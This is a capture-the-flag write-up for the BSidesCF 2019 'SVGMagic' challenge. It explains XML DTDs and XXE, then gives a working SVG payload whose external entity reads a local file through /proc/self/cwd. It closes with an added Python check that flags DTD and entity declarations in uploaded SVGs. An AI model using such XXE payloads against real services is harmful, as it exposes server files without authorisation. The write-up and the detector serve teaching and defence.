# [BSidesCF 2019]SVGMagic

0x01. Topics covered:

  • XXE
  • file:///proc/self/cwd/ is the current directory

0x02. Background

Reference link: "A Summary of Learning About and Exploiting XXE Vulnerabilities"

[Figure: XML structure]

DTD (Document Type Definition)

  1. Internal declaration, e.g. <!DOCTYPE test any>

    <?xml version="1.0"?>
    <!DOCTYPE note [
      <!ELEMENT note (to,from,heading,body)>
      <!ELEMENT to      (#PCDATA)>
      <!ELEMENT from    (#PCDATA)>
      <!ELEMENT heading (#PCDATA)>
      <!ELEMENT body    (#PCDATA)>
    ]>
    <note>
      <to>George</to>
      <from>John</from>
      <heading>Reminder</heading>
      <body>Don't forget the meeting!</body>
    </note>
    
  2. External declaration (referencing an external DTD), e.g. <!DOCTYPE test SYSTEM 'http://www.test.com/evil.dtd'>

    <?xml version="1.0"?>
    <!DOCTYPE note SYSTEM "note.dtd">
    <note>
    <to>George</to>
    <from>John</from>
    <heading>Reminder</heading>
    <body>Don't forget the meeting!</body>
    </note>
    

    where note.dtd contains:

    <!ELEMENT note (to,from,heading,body)>
    <!ELEMENT to (#PCDATA)>
    <!ELEMENT from (#PCDATA)>
    <!ELEMENT heading (#PCDATA)>
    <!ELEMENT body (#PCDATA)>
    
    

0x03. Solution

payload:


    <?xml version="1.0" encoding="UTF-8" standalone="no"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "file:///proc/self/cwd/flag.txt" >]>
    <svg width="512px" height="190px" viewBox="0 0 512 190" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" preserveAspectRatio="xMidYMid">
        <g>
            <text x="0" y="15" fill="red">&xxe;</text>
        </g>
    </svg>
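
The payload works because the server-side SVG renderer accepts a DOCTYPE and resolves the external entity it declares. As an added example (not part of the original post), the check below uses Python's standard expat bindings to report DTD and entity declarations in an uploaded SVG without resolving them; the function names and the reject-any-DTD policy are assumptions made for illustration.

```python
import xml.parsers.expat as expat


def dtd_findings(svg_bytes):
    """List the DTD and entity declarations in an uploaded SVG.

    expat only reports declarations to the handlers below. No
    ExternalEntityRefHandler is installed, so nothing is fetched.
    """
    findings = []
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.append(("doctype", name, system_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        # External entities have no literal value, only a system/public id.
        kind = "external-entity" if value is None else "internal-entity"
        findings.append((kind, name, system_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(svg_bytes, True)
    except expat.ExpatError as exc:
        findings.append(("malformed", str(exc), None))
    return findings


def accept_upload(svg_bytes):
    """Hypothetical policy: an SVG bound for a renderer carries no DTD at all."""
    return not dtd_findings(svg_bytes)


# Constructed samples; the first has the same shape as the payload above.
SAMPLE_XXE = b"""<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///proc/self/cwd/flag.txt" >]>
<svg xmlns="http://www.w3.org/2000/svg"><text x="0" y="15">&xxe;</text></svg>"""
SAMPLE_CLEAN = b'<svg xmlns="http://www.w3.org/2000/svg"><text>hi</text></svg>'

if __name__ == "__main__":
    for label, sample in (("xxe", SAMPLE_XXE), ("clean", SAMPLE_CLEAN)):
        print(label, accept_upload(sample), dtd_findings(sample))
```

Rejecting the upload at this stage complements, rather than replaces, disabling DTD loading and entity resolution in the renderer's own XML parser.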



posted @ 2021-10-03 23:07  步行街